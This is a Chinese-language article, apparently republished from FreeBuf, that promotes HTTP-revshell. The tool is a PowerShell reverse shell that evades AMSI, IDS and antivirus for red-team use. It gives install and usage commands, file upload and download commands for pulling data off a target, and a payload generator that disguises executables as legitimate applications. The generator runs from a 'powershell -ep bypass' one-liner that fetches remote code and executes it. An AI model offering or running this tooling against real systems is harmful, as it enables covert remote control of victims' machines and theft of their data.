HTTP-revshell：能绕过AMSI的PowerShell代理感知型反向Shell

FB客服

发布于 2020-12-08 16:02:44

77200

代码可运行

文章被收录于专栏：FreeBufFreeBuf

运行总次数：0

代码可运行

HTTP-revshell

HTTP-revshell是一个能够绕过AMSI的PowerShell代理感知型反向Shell，这款工具转为红队研究人员以及渗透测试人员设计，能够通过HTTP/S协议来给研究人员提供一个反向Shell链接。HTTP-revshell使用了一种隐蔽的数据信道，可以通过Web请求来获取目标设备的控制权，从而绕过类似IDS、IPS和AV之类的安全解决方案。

功能介绍

SSL
代理感知
上传功能
下载功能
错误控制
AMSI绕过
服务器端多会话支持
PowerShell函数自动补全

工具安装

广大研究人员可以使用下列命令将该项目源码克隆至本地，并完成依赖组件的自动化安装：

git clone https://github.com/3v4Si0N/HTTP-revshell.git

cd HTTP-revshell/

pip3 install -r requirements.txt

数据提取功能使用

上传：

upload /src/path/file C:\dest\path\file

下载：

download C:\src\path\file /dst/path/file

查看server.py帮助-服务器端使用

usage: server.py [-h] [--ssl] [--autocomplete] host port

Process some integers.

positional arguments:

  host            Listen Host

  port            Listen Port

optional arguments:

  -h, --help      show this help message and exit

  --ssl           Send traffic over ssl

  --autocomplete  Autocomplete powershell functions

查看WebRev.ps1帮助-客户端使用

Import-Module .\Invoke-WebRev.ps1

Invoke-WebRev -ip IP -port PORT [-ssl]

工具使用-server-multisession.py（服务器端多会话支持）

服务器端支持同时与客户端建立多个链接，下面给出的菜单中包含三哥基础命令，即sessions、interact和exit：

- sessions --> 显示当前活动会话

     - interact --> 与一个会话进行交互，比如说：interact <session_id>

     - exit --> 关闭应用程序

如需修改会话，可以按下CTRL+D来退出当前会话，此时不会关闭原有会话。

Revshell-Generator.ps1-Payload自动生成器

这个脚本可以帮助我们创建一个带有Payload的可执行文件，这个文件是我们使用HTTP-revshell所必须的。工具提供了六个预定义的模板和一个支持自定义的模板。工具生成的Payload会伪装成合法应用程序的图标、产品信息和版权信息等等。除此之外，它们都会在与服务器建立连接之前打开原始的应用程序，并伪装成合法应用程序来执行。

Payload生成器使用：

powershell -ep bypass "iwr -useb https://raw.githubusercontent.com/3v4Si0N/HTTP-revshell/master/Revshell-Generator.ps1 | iex"

工具使用样例

许可证协议

本项目的开发与发布遵循LGPLv3+开源许可证协议。

项目地址

HTTP-revshell：【GitHub传送门】

本文参与腾讯云自媒体同步曝光计划，分享自微信公众号。

原始发表：2020-12-05，如有侵权请联系 cloudcommunity@tencent.com 删除

http

本文分享自 FreeBuf 微信公众号，前往查看

如有侵权，请联系 cloudcommunity@tencent.com 删除。

本文参与腾讯云自媒体同步曝光计划，欢迎热爱写作的你一起参与！

登录后参与评论

0 条评论

热度